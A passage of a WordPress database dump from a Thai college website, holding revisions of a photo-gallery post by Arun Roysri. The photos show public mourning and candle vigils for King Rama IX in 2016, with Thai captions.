ขณะเสด็จพระราชทานฝูงแกะในพื้นที่หมู่บ้านห้วยห้อมแก่ประชาชน และต่อมาพระองค์ได้ริเริ่มโครงการพระราชดําริ อันส่งผลให้ชาวบ้านห้วยห้อมมีชีวิตความเป็นอยู่ที่ดีขึ้น</p>\r\n\r\n<h3 class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4335 size-full\" src=\"/wp-content/uploads/2018/11/73-Arun-Roysri-copy.jpg\" alt=\"\" width=\"1200\" height=\"799\" /></h3>\r\n<p style=\"text-align: center;\">ในวันที่ 11 ธันวาคม พ.ศ. 2559 กลุ่มชาติพันธุ์ที่อาศัยอยู่ในจังหวัดทางภาคเหนือและภาคตะวันออกเฉียงเหนือ จํานวน 41 กลุ่ม พร้อมใจเดินทางมายังพระบรมมหาราชวัง เพื่อมาถวายสักการะพระบรมศพพระบาทสมเด็จพระปรมินทรมหาภูมิพลอดุลยเดช เบื้องหน้าพระบรมโกศ ณ พระที่นั่งดุสิตมหาปราสาท พร้อมทั้งประกอบพิธีส่งดวงพระวิญญาณของในหลวงรัชกาลที่ 9 ตามแบบแผนประเพณีของแต่ละกลุ่มชาติพันธุ์ด้วย</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“ครั้งหนึ่งในชีวิต”</span></h3>\r\n<h3 class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4336 size-full\" src=\"/wp-content/uploads/2018/11/74-Arun-Roysri-copy.jpg\" alt=\"\" width=\"1198\" height=\"799\" /></h3>\r\n<p style=\"text-align: center;\">หญิงชาวอิวเมี่ยน (เมี่ยน) ในชุดแต่งกายประจํากลุ่มชาติพันธุ์ที่โดดเด่นด้วยผ้าโพกศีรษะขนาดใหญ่สีดํากับลวดลายที่วิจิตรบรรจงตรงด้านบนศีรษะและไหมพรมสีแดงอ่อนที่พันอยู่รอบคอที่ดูตัดกับเสื้อผ้าสีดําอย่างโดดเด่นกําลังนั่งรอเข้ากราบพระบรมศพในหลวงรัชกาลที่ 9 ในบริเวณพระบรมหาราชวัง</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">\"การแสดงพลังของเหล่านักเรียนชั้นมัธยมศึกษาโรงเรียนอัสสัมชัญ\"</span></h3>\r\n<h3 class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4337 size-full\" src=\"/wp-content/uploads/2018/11/76-Arun-Roysri-copy.jpg\" alt=\"\" width=\"1200\" height=\"799\" /></h3>\r\n<p style=\"text-align: center;\">เขตบางรัก กรุงเทพฯ ด้วยการแปรอักษรเป็นพระบรมฉายาลักษณ์ ทั้งหมด 11 ภาพ ที่มีทั้งความงดงาม ความพร้อมเพรียง และความทุ่มเท</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">\"ด้วยความไร้เดียงสา\"</span></h3>\r\n<h3 class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4338 size-full\" src=\"/wp-content/uploads/2018/11/77-Arun-Roysri-copy.jpg\" alt=\"\" width=\"1200\" height=\"799\" /></h3>\r\n<p style=\"text-align: center;\">เด็ก ๆ ตื่นเต้นกับการได้จุดเทียนและร้องเพลงสรรเสริญพระบารมี ในงานถวายความอาลัยแด่พระบาทสมเด็จพระปรมินทรมหาภูมิพลอดุลยเดช ณ บริเวณริมแม่นํ้าแม่กลอง จังหวัดราชบุรี</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“ประสานเสียง”</span></h3>\r\n<h3 class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4339 size-full\" src=\"/wp-content/uploads/2018/11/81-Arun-Roysri-copy.jpg\" alt=\"\" width=\"1198\" height=\"799\" /></h3>\r\n<p style=\"text-align: center;\">นักเรียนระดับอนุบาลร้องเพลงประสานเสียง “ลูกของพ่อ” และ “พระราชาในนิทาน” ในงานถวายความอาลัยแด่พระบาทสมเด็จพระปรมินทรมหาภูมิพลอดุลยเดช ณ สนามกีฬาไอโมบาย จังหวัดบุรีรัมย์</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“ณ กําแพงบ้านพ่อ”</span></h3>\r\n<h3 class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4340 size-full\" src=\"/wp-content/uploads/2018/11/91-Arun-Roysri-copy.jpg\" alt=\"\" width=\"1200\" height=\"799\" /></h3>', 'ภาพถ่าย โดย อรุณ ร้อยศรี', '', 'inherit', 'closed', 'closed', '', '4341-revision-v1', '', '', '2018-11-12 14:00:19', '2018-11-12 07:00:19', '', 4341, 'http://www.technicrayong.ac.th/4341-revision-v1/', 0, 'revision', '', 0);
INSERT INTO `wp_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(4376, 3, '2018-11-12 14:10:10', '2018-11-12 07:10:10', '<h3 style=\"text-align: center;\"><span class=\"fontstyle0\" style=\"color: #993300;\">“พิธีจุดเทียนถวายความอาลัยและสวดมนต์ข้ามปี ของชาวเมืองบุรีรัมย์”</span></h3>\r\n<img class=\"aligncenter wp-image-4313 size-large\" src=\"/wp-content/uploads/2018/11/2-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />\r\n<p style=\"text-align: center;\">พระภิกษุชาวเมืองบุรีรัมย์และจังหวัดใกล้เคียงร่วมกันทําพิธีสวดมนต์ข้ามปี เนื่องในวันสิ้นปี และถวายความอาลัยแด่ในหลวงรัชกาลที่ 9</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“ภาพจากพลังความตั้งใจ”</span></h3>\r\n<img class=\"aligncenter wp-image-4314 size-large\" src=\"/wp-content/uploads/2018/11/3-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />\r\n<p style=\"text-align: center;\">การแสดงพลังของเหล่านักเรียนชั้นมัธยมศึกษาโรงเรียนอัสสัมชัญ เขตบางรัก กรุงเทพฯ ด้วยการแปรอักษรเป็นพระบรมฉายาลักษณ์ ทั้งหมด 11 ภาพ ที่มีทั้งความงดงาม ความพร้อมเพรียง และความทุ่มเท</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“เพื่อประชาชนด้วยพระหัตถ์ของพระองค์เอง”</span></h3>\r\n<img class=\"aligncenter wp-image-4315 size-large\" src=\"/wp-content/uploads/2018/11/4-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />\r\n<p style=\"text-align: center;\">พระเจ้าวรวงศ์เธอ พระองค์เจ้าโสมสวลี พระวรราชาทินัดดามาตุ ทรงประกอบอาหารด้วยพระองค์เอง เพื่อประทานแก่ประชาชนที่เข้ามากราบพระบรมศพในหลวงรัชกาลที่ 9 ณ บริเวณท้องสนามหลวง</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“พิธีสวดมิสซา”</span></h3>\r\n<p class=\"alignnone\"><img class=\"aligncenter wp-image-4316 size-large\" src=\"/wp-content/uploads/2018/11/12-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" /></p>\r\n<p class=\"alignnone\" style=\"text-align: center;\">การสวดมิสซาในโบสถ์อัสสัมชัญบางรัก กรุงเทพฯ เพื่อแสดงการไว้อาลัยต่อการจากไปของพระบาทสมเด็จพระปรมินทรมหาภูมิพลอดุลยเดช</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“การปฏิบัติงานของเจ้าหน้าที่”</span></h3>\r\n<p class=\"alignnone\"><img class=\"aligncenter wp-image-4317 size-large\" src=\"/wp-content/uploads/2018/11/17-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" /></p>\r\n<p style=\"text-align: center;\">เจ้าหน้าที่ตํารวจปฏิบัติหน้าที่บริเวณถนนหน้าพระลาน เพื่อจัดระเบียบและอํานวยความสะดวกแก่ประชาชนที่เข้ามาร่วมถวายสักการะพระบรมศพในหลวงรัชกาลที่ 9</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\"> “แต่งดํา ทั้งเมือง”</span></h3>\r\n<p class=\"alignnone\"><img class=\"aligncenter wp-image-4318 size-large\" src=\"/wp-content/uploads/2018/11/21-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" /></p>\r\n<p class=\"alignnone\" style=\"text-align: center;\">บรรยากาศการไว้อาลัยแด่ในหลวงรัชกาลที่ 9 ณ สถานีรถไฟฟ้ า BTS สยาม</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“ชาวมอญ”</span></h3>\r\n<p class=\"alignnone\"><img class=\"aligncenter wp-image-4319 size-large\" src=\"/wp-content/uploads/2018/11/23-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" /></p>\r\n<p style=\"text-align: center;\">ประชาชนที่มาถวายความอาลัยในหลวงรัชกาลที่ 9 ณ พระบรมหาราชวัง มักแต่งกายด้วยเสื้อผ้าสีดําเป็นหลัก แต่มีพสกนิกรอีกจํานวนไม่น้อย โดยเฉพาะกลุ่มชาติพันธุ์ต่าง ๆ ที่เลือกใส่เสื้อผ้าอาภรณ์อันเป็นเอกลักษณ์ ของกลุ่มตนเองมาถวายความอาลัยแทนเสื้อผ้าสีดํา เช่น ชาวไทยเชื้อสายมอญจากอําเภอสังขละบุรี จังหวัดกาญจนบุรีที่มากราบสักการะพระบรมศพในหลวงรัชกาลที่ 9 ในชุดแต่งกายประจําถิ่น</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“เก็บไว้ในความทรงจํา”</span></h3>\r\n<p class=\"alignnone\"><img class=\"aligncenter wp-image-4320 size-large\" src=\"/wp-content/uploads/2018/11/24-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" /></p>\r\n<p style=\"text-align: center;\">นอกจากจุดเทียนและวางดอกไม้เพื่อแสดงความอาลัย ณ บริเวณกําแพงด้านหน้าพระบรมมหาราชวังแล้ว ประชาชนจํานวนมากยังได้ซื้อหาพระบรมสาทิสลักษณ์ และพระบรมฉายาลักษณ์ที่พ่อค้าแม่ค้าจํานวนมากมาจําหน่ายเพื่อเก็บไว้เป็นความทรงจํา</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">\"ในเวลากลางคืน บริเวณถนนรอบพระบรมมหาราชวัง\"</span></h3>\r\n<p class=\"alignnone\"><img class=\"aligncenter wp-image-4321 size-large\" src=\"/wp-content/uploads/2018/11/27-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" /></p>\r\n<p style=\"text-align: center;\">คลาคลํ่าไปด้วยผู้คนที่มาแสดงความอาลัยและถ่ายรูปเป็นที่ระลึก จุดหนึ่งที่เป็นที่นิยมในการถ่ายรูป คือ ด้านหน้าประตูวิมานเทเวศร์ ที่สามารถมองเห็นพระที่นั่งดุสิตมหาปราสาท ซึ่งเป็นที่ประดิษฐานพระบรมศพของในหลวงรัชกาลที่ 9</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">\"ครอบครัวพาสมาชิกตัวน้อยมาร่วมวางดอกไม้ ณ ริมกํา แพงพระบรมมหาราชวัง\"</span></h3>\r\n<p class=\"alignnone\"><img class=\"aligncenter wp-image-4322 size-large\" src=\"/wp-content/uploads/2018/11/32-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" /></p>\r\n<p style=\"text-align: center;\">เพื่อแสดงความอาลัยต่อการเสด็จสวรรคตของพระบาทสมเด็จพระปรมินทรมหาภูมิพลอดุลยเดช และร่วมเป็นส่วนหนึ่งในช่วงเวลาที่สําคัญที่สุดของคนไทยทั้งประเทศ</p>\r\n<p class=\"alignnone\"><img class=\"aligncenter wp-image-4323 size-large\" src=\"/wp-content/uploads/2018/11/37-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" /></p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\"> “ข้างกําแพงวัง”</span></h3>\r\n<p class=\"alignnone\"><img class=\"aligncenter wp-image-4324 size-large\" src=\"/wp-content/uploads/2018/11/38-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" /></p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“ในวันที่พ่อจากไป...”</span></h3>\r\n<p class=\"alignnone\"><img class=\"aligncenter wp-image-4325 size-large\" src=\"/wp-content/uploads/2018/11/42-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" /></p>\r\n<p style=\"text-align: center;\">ศูนย์การค้าแห่งหนึ่งจัดงานรําลึกและจุดเทียนถวายความอาลัยแด่ในหลวงรัชกาลที่ 9 ซึ่งในงานมีการแจกภาพในหลวงและลงนามถวายความอาลัย</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“กราบรําลึกถึงพระองค์”</span></h3>\r\n<p class=\"alignnone\"><img class=\"aligncenter wp-image-4326 size-large\" src=\"/wp-content/uploads/2018/11/43-Arun-Roysri-copy-1024x576.jpg\" alt=\"\" width=\"640\" height=\"360\" /></p>\r\n<p style=\"text-align: center;\">ราว 2 ทุ่ม ของวันพฤหัสบดีที่ 27 ตุลาคม พ.ศ. 2559 ชาวโพธาราม จังหวัดราชบุรีและอําเภอใกล้เคียง ได้มารวมตัวกันจุดเทียนสีขาว ร้องเพลงสรรเสริญพระบารมี และกราบพระบรมฉายาลักษณ์ของในหลวงรัชกาลที่ 9 ณ บริเวณหาดทรายโพธารามริมแม่นํ้าแม่กลอง ด้วยความอาลัยและรําลึกถึงพระมหากรุณาธิคุณของพระองค์</p>\r\n<p class=\"alignnone\"><img class=\"aligncenter wp-image-4327 size-large\" src=\"/wp-content/uploads/2018/11/54-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" /></p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“เฝ้ารอ...”</span></h3>\r\n<p class=\"alignnone\"><img class=\"aligncenter wp-image-4328 size-large\" src=\"/wp-content/uploads/2018/11/55-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" /></p>\r\n<p style=\"text-align: center;\">ประชาชนตลอดสองฝั่งถนนรอรับขบวนเสด็จพระบรมวงศานุวงศ์ ที่เสด็จมาประกอบพิธีทางศาสนา เมื่อเสร็จพิธีเจ้าหน้าที่จะอนุญาตให้ประชาชน\r\nเข้าไปวางดอกไม้และจุดเทียนรอบกําแพงพระบรมมหาราชวัง</p>\r\n\r\n<h3 class=\"alignnone\" style=\"text-align: center;\"><span style=\"color: #993300;\">“เสียงประสานจากใจ”</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4329 size-large\" src=\"/wp-content/uploads/2018/11/57-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" /></p>\r\n<p class=\"alignnone\" style=\"text-align: center;\">ประชาชนที่ร่วมกันร้องเพลงสรรเสริญพระบารมีและจุดเทียนถวายความอาลัย บริเวณท้องสนามหลวงและรอบกําแพงพระบรมมหาราชวัง</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">\"ในเวลากลางคืน บริเวณถนนรอบพระบรมมหาราชวัง\"</span></h3>\r\n<h3 class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4330 size-large\" src=\"/wp-content/uploads/2018/11/59-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" /></h3>\r\n<p style=\"text-align: center;\">คลาคลํ่าไปด้วยผู้คนที่มาแสดงความอาลัยและถ่ายรูปเป็นที่ระลึกจุดหนึ่งที่เป็นที่นิยมในการถ่ายรูป คือ ด้านหน้าประตูวิมานเทเวศร์ ที่สามารถมองเห็นพระที่นั่งดุสิตมหาปราสาท ซึ่งเป็นที่ประดิษฐาน พระบรมศพของในหลวงรัชกาลที่ 9</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“เทียนและดอกไม้แห่งการรําลึก”</span></h3>\r\n<h3 class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4331 size-large\" src=\"/wp-content/uploads/2018/11/62-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" /></h3>\r\n<p style=\"text-align: center;\">ช่วงแรกหลังจากการสวรรคตของพระบาทสมเด็จพระปรมินทรมหาภูมิพลอดุลยเดชประชาชนจะนําเทียนและดอกไม้มากราบไหว้ เพื่อเป็นการแสดงความอาลัยต่อพระองค์ทุกคนต่างมาด้วยความรู้สึกโศกเศร้าเสียใจอย่างสุดซึ้ง</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“สวดมนต์ ภาวนา”</span></h3>\r\n<h3 class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4332 size-large\" src=\"/wp-content/uploads/2018/11/64-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" /></h3>\r\n<p style=\"text-align: center;\">แม่ชีและนักศึกษาร่วมกันนั่งสวดมนต์ภาวนา เพื่อถวายเป็นพระราชกุศลแด่ในหลวงรัชกาลที่ 9 ณ ท้องสนามหลวง</p>\r\n\r\n<h3 class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4333 size-large\" src=\"/wp-content/uploads/2018/11/70-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" /></h3>\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“ตามรอยเส้นทางพระราชดําเนิน”</span></h3>\r\n<h3 class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4334 size-large\" src=\"/wp-content/uploads/2018/11/72-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" /></h3>\r\n<p style=\"text-align: center;\">เจริญ นักรบไพร ชาวบ้านหมู่บ้านห้วยห้อม จังหวัดแม่ฮ่องสอน ถือพระบรมฉายาลักษณ์ของในหลวงรัชกาลที่ 9 ขณะเสด็จพระราชทานฝูงแกะในพื้นที่หมู่บ้านห้วยห้อมแก่ประชาชน และต่อมาพระองค์ได้ริเริ่มโครงการพระราชดําริ อันส่งผลให้ชาวบ้านห้วยห้อมมีชีวิตความเป็นอยู่ที่ดีขึ้น</p>\r\n\r\n<h3 class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4335 size-large\" src=\"/wp-content/uploads/2018/11/73-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" /></h3>\r\n<p style=\"text-align: center;\">ในวันที่ 11 ธันวาคม พ.ศ. 2559 กลุ่มชาติพันธุ์ที่อาศัยอยู่ในจังหวัดทางภาคเหนือและภาคตะวันออกเฉียงเหนือ จํานวน 41 กลุ่ม พร้อมใจเดินทางมายังพระบรมมหาราชวัง เพื่อมาถวายสักการะพระบรมศพพระบาทสมเด็จพระปรมินทรมหาภูมิพลอดุลยเดช เบื้องหน้าพระบรมโกศ ณ พระที่นั่งดุสิตมหาปราสาท พร้อมทั้งประกอบพิธีส่งดวงพระวิญญาณของในหลวงรัชกาลที่ 9 ตามแบบแผนประเพณีของแต่ละกลุ่มชาติพันธุ์ด้วย</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“ครั้งหนึ่งในชีวิต”</span></h3>\r\n<h3 class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4336 size-large\" src=\"/wp-content/uploads/2018/11/74-Arun-Roysri-copy-1024x683.jpg\" alt=\"\" width=\"640\" height=\"427\" /></h3>\r\n<p style=\"text-align: center;\">หญิงชาวอิวเมี่ยน (เมี่ยน) ในชุดแต่งกายประจํากลุ่มชาติพันธุ์ที่โดดเด่นด้วยผ้าโพกศีรษะขนาดใหญ่สีดํากับลวดลายที่วิจิตรบรรจงตรงด้านบนศีรษะและไหมพรมสีแดงอ่อนที่พันอยู่รอบคอที่ดูตัดกับเสื้อผ้าสีดําอย่างโดดเด่นกําลังนั่งรอเข้ากราบพระบรมศพในหลวงรัชกาลที่ 9 ในบริเวณพระบรมหาราชวัง</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">\"การแสดงพลังของเหล่านักเรียนชั้นมัธยมศึกษาโรงเรียนอัสสัมชัญ\"</span></h3>\r\n<h3 class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4337 size-large\" src=\"/wp-content/uploads/2018/11/76-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" /></h3>\r\n<p style=\"text-align: center;\">เขตบางรัก กรุงเทพฯ ด้วยการแปรอักษรเป็นพระบรมฉายาลักษณ์ ทั้งหมด 11 ภาพ ที่มีทั้งความงดงาม ความพร้อมเพรียง และความทุ่มเท</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">\"ด้วยความไร้เดียงสา\"</span></h3>\r\n<h3 class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4338 size-large\" src=\"/wp-content/uploads/2018/11/77-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" /></h3>\r\n<p style=\"text-align: center;\">เด็ก ๆ ตื่นเต้นกับการได้จุดเทียนและร้องเพลงสรรเสริญพระบารมี ในงานถวายความอาลัยแด่พระบาทสมเด็จพระปรมินทรมหาภูมิพลอดุลยเดช ณ บริเวณริมแม่นํ้าแม่กลอง จังหวัดราชบุรี</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“ประสานเสียง”</span></h3>\r\n<h3 class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4339 size-large\" src=\"/wp-content/uploads/2018/11/81-Arun-Roysri-copy-1024x683.jpg\" alt=\"\" width=\"640\" height=\"427\" /></h3>\r\n<p style=\"text-align: center;\">นักเรียนระดับอนุบาลร้องเพลงประสานเสียง “ลูกของพ่อ” และ “พระราชาในนิทาน” ในงานถวายความอาลัยแด่พระบาทสมเด็จพระปรมินทรมหาภูมิพลอดุลยเดช ณ สนามกีฬาไอโมบาย จังหวัดบุรีรัมย์</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“ณ กําแพงบ้านพ่อ”</span></h3>\r\n<h3 class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4340 size-large\" src=\"/wp-content/uploads/2018/11/91-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" /></h3>', 'ภาพถ่าย โดย อรุณ ร้อยศรี', '', 'inherit', 'closed', 'closed', '', '4341-revision-v1', '', '', '2018-11-12 14:10:10', '2018-11-12 07:10:10', '', 4341, 'http://www.technicrayong.ac.th/4341-revision-v1/', 0, 'revision', '', 0),
(4378, 3, '2018-11-12 14:13:18', '2018-11-12 07:13:18', 'https://youtu.be/xrNi-56jrzQ\r\n<h4><span style=\"color: #993300;\"><strong>เชิญชมภาพถ่าย คลิก Link ด้านล่าง</strong></span></h4>\r\n<a href=\"http://www.technicrayong.ac.th/ภาพถ่าย-โดย-อรุณ-ร้อยศรี\">ภาพถ่าย โดย อรุณ ร้อยศรี</a>\r\n\r\nภาพถ่าย โดย บัณฑิต โชติสุวรรณ\r\n\r\nภาพถ่าย โดย จันทร์กลาง กันทอง\r\n\r\nภาพถ่าย โดย เริงชัย คงเมือง\r\n\r\nภาพถ่าย โดย เริงฤทธิ์ คงเมือง', '๑๐๐ วัน ร้อยเรื่อง เปลี่ยนความโทมนัสเป็นพลัง', '', 'inherit', 'closed', 'closed', '', '3805-revision-v1', '', '', '2018-11-12 14:13:18', '2018-11-12 07:13:18', '', 3805, 'http://www.technicrayong.ac.th/3805-revision-v1/', 0, 'revision', '', 0),
(4379, 3, '2018-11-12 14:15:07', '2018-11-12 07:15:07', '<h3 style=\"text-align: center;\"><span class=\"fontstyle0\" style=\"color: #993300;\">“พิธีจุดเทียนถวายความอาลัยและสวดมนต์ข้ามปี ของชาวเมืองบุรีรัมย์”</span></h3>\r\n<img class=\"aligncenter wp-image-4313 size-large\" src=\"/wp-content/uploads/2018/11/2-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />\r\n<p style=\"text-align: center;\">พระภิกษุชาวเมืองบุรีรัมย์และจังหวัดใกล้เคียงร่วมกันทําพิธีสวดมนต์ข้ามปี เนื่องในวันสิ้นปี และถวายความอาลัยแด่ในหลวงรัชกาลที่ 9</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“ภาพจากพลังความตั้งใจ”</span></h3>\r\n<img class=\"aligncenter wp-image-4314 size-large\" src=\"/wp-content/uploads/2018/11/3-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />\r\n<p style=\"text-align: center;\">การแสดงพลังของเหล่านักเรียนชั้นมัธยมศึกษาโรงเรียนอัสสัมชัญ เขตบางรัก กรุงเทพฯ ด้วยการแปรอักษรเป็นพระบรมฉายาลักษณ์ ทั้งหมด 11 ภาพ ที่มีทั้งความงดงาม ความพร้อมเพรียง และความทุ่มเท</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“เพื่อประชาชนด้วยพระหัตถ์ของพระองค์เอง”</span></h3>\r\n<img class=\"aligncenter wp-image-4315 size-large\" src=\"/wp-content/uploads/2018/11/4-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />\r\n<p style=\"text-align: center;\">พระเจ้าวรวงศ์เธอ พระองค์เจ้าโสมสวลี พระวรราชาทินัดดามาตุ ทรงประกอบอาหารด้วยพระองค์เอง เพื่อประทานแก่ประชาชนที่เข้ามากราบพระบรมศพในหลวงรัชกาลที่ 9 ณ บริเวณท้องสนามหลวง</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“พิธีสวดมิสซา”</span></h3>\r\n<p class=\"alignnone\"><img class=\"aligncenter wp-image-4316 size-large\" src=\"/wp-content/uploads/2018/11/12-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />การสวดมิสซาในโบสถ์อัสสัมชัญบางรัก กรุงเทพฯ เพื่อแสดงการไว้อาลัยต่อการจากไปของพระบาทสมเด็จพระปรมินทรมหาภูมิพลอดุลยเดช</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“การปฏิบัติงานของเจ้าหน้าที่”</span></h3>\r\n<p class=\"alignnone\"><img class=\"aligncenter wp-image-4317 size-large\" src=\"/wp-content/uploads/2018/11/17-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" /></p>\r\n<p style=\"text-align: center;\">เจ้าหน้าที่ตํารวจปฏิบัติหน้าที่บริเวณถนนหน้าพระลาน เพื่อจัดระเบียบและอํานวยความสะดวกแก่ประชาชนที่เข้ามาร่วมถวายสักการะพระบรมศพในหลวงรัชกาลที่ 9</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\"> “แต่งดํา ทั้งเมือง”</span></h3>\r\n<p class=\"alignnone\"><img class=\"aligncenter wp-image-4318 size-large\" src=\"/wp-content/uploads/2018/11/21-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" /></p>\r\n<p class=\"alignnone\" style=\"text-align: center;\">บรรยากาศการไว้อาลัยแด่ในหลวงรัชกาลที่ 9 ณ สถานีรถไฟฟ้ า BTS สยาม</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“ชาวมอญ”</span></h3>\r\n<p class=\"alignnone\"><img class=\"aligncenter wp-image-4319 size-large\" src=\"/wp-content/uploads/2018/11/23-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" /></p>\r\n<p style=\"text-align: center;\">ประชาชนที่มาถวายความอาลัยในหลวงรัชกาลที่ 9 ณ พระบรมหาราชวัง มักแต่งกายด้วยเสื้อผ้าสีดําเป็นหลัก แต่มีพสกนิกรอีกจํานวนไม่น้อย โดยเฉพาะกลุ่มชาติพันธุ์ต่าง ๆ ที่เลือกใส่เสื้อผ้าอาภรณ์อันเป็นเอกลักษณ์ ของกลุ่มตนเองมาถวายความอาลัยแทนเสื้อผ้าสีดํา เช่น ชาวไทยเชื้อสายมอญจากอําเภอสังขละบุรี จังหวัดกาญจนบุรีที่มากราบสักการะพระบรมศพในหลวงรัชกาลที่ 9 ในชุดแต่งกายประจําถิ่น</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“เก็บไว้ในความทรงจํา”</span></h3>\r\n<p class=\"alignnone\"><img class=\"aligncenter wp-image-4320 size-large\" src=\"/wp-content/uploads/2018/11/24-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" /></p>\r\n<p style=\"text-align: center;\">นอกจากจุดเทียนและวางดอกไม้เพื่อแสดงความอาลัย ณ 